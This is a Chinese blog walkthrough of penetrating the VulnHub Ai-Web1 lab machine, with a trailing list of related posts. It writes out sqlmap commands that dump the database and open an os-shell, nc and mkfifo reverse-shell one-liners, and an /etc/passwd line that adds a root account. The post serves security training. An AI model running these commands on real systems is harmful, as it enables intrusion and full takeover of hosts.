vulnhub——Ai-Web1靶机渗透

已于 2024-08-09 14:00:45 修改
阅读量887 收藏 20
点赞数 25
分类专栏: 渗透攻击 文章标签: 网络 web安全
于 2024-07-20 18:10:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63034068/article/details/140548767
版权

目录

Ai-Web1靶机渗透

一、信息收集

二、sql注入

三、文件上传

四、反弹shell

五、提权

Ai-Web1靶机渗透

靶机下载:

官网地址:https://www.vulnhub.com/entry/ai-web-1,353/

攻击机:kali2024

一、信息收集

发下目标主机的IP为:192.168.201.141

用nmap工具扫描一下对方主机和服务

发现他打开了80端口

发现搜不到于是我们用工具去扫描一下

我们发现了两个目录,于是我们去访问一下

我们再去扫一下另一个路径,我们看到了一个php文件

二、sql注入

这里我们尝试一下是否存在sql注入

我们用burp抓一下包

这里我们知道了他要上传的地方,我们可以利用sqlmap进行脱库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs #列出库
 

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables #列出表

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 -T user --columns #列出字段

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell #
 

选择php(default)custom location(s) 

输入获取到的绝对路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

三、文件上传

首先我们写一个一句话木马

四、反弹shell

1、kali本地监听:nc -lvvp 6666(或者nc -lnvp)

2、蚁剑终端上nc反弹:nc -e /bin/bash 192.168.201.136 6666(发现-e参数不可用)

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.141 6666 >/tmp/f

4、python -c "import pty;pty.spawn('/bin/bash')"(python写交互)

五、提权

searchsploit linux kernel 4.15.0-58-generic 搜一下相关的内核漏洞发现没有可以利用的 文件

openssl passwd -1 -salt admin 123456

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

生活的高手☆
关注
  • 25
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1
热门推荐
Aluxian_的博客
04-26 1万+
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个Web的漏洞靶机,老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/a
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1113
vulnhub ai-web1.0
Vulnhub靶机AI-WEB-1.0
weixin_68416970的博客
05-22 1081
Vulnhub靶机AI-WEB-1.0。AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 549
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3990
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
VulnhubAI-web 1.0靶机详解
最新发布
weixin_62457642的博客
08-01 805
靶机AI-web1.0速刷
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透
YatKTm的博客
12-06 3308
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEBweb类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1375
AIweb2靶场渗透测试
web靶机渗透思路--web渗透笔记-思路,综合渗透笔记思路(入门)(待补全)
m0_73935461的博客
04-11 2174
1. 信息收集:收集目标网站的相关信息,包括域名、IP地址、服务器类型、网站架构等。 2. 漏洞扫描:使用漏洞扫描工具对目标网站进行扫描,发现可能存在的漏洞,如SQL注入、XSS、文件上传等。 3. 弱口令测试:对目标网站的登录界面、管理员后台等进行弱口令测试,尝试使用常见的弱口令进行登录。 4. 目录遍历:通过目录遍历攻击手法,尝试访问目标网站的敏感文件和目录,如配置文件、日志文件等。 5. 文件上传测试:对目标网站的文件上传功能进行测试,尝试上传恶意文件,并执行任意代码。 6. XSS攻击:通
AI:WEB:1 Walkthrough
weixin_30470643的博客
09-26 327
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏览网页 爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 提权 读取falg文件靶机和攻击机处于统一网段下 所以就不用net...
DVWA(Web 渗透靶机环境)+csrf漏洞练习
net的博客
03-16 3704
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(跨站请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上传)、6、Insecure CAPTCHA (不安全的验证码)、
AI_web_1 ,靶机初体验
weixin_44377940的博客
12-06 372
大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了 首先,用netdiscover先看看主机的ip是啥: 试试第一个 图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。 浏览器打开看看: 试试id=1: 估计有注入,祭出神器sqlmap: 但是,好像没有意义,因为这个是sql用户,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值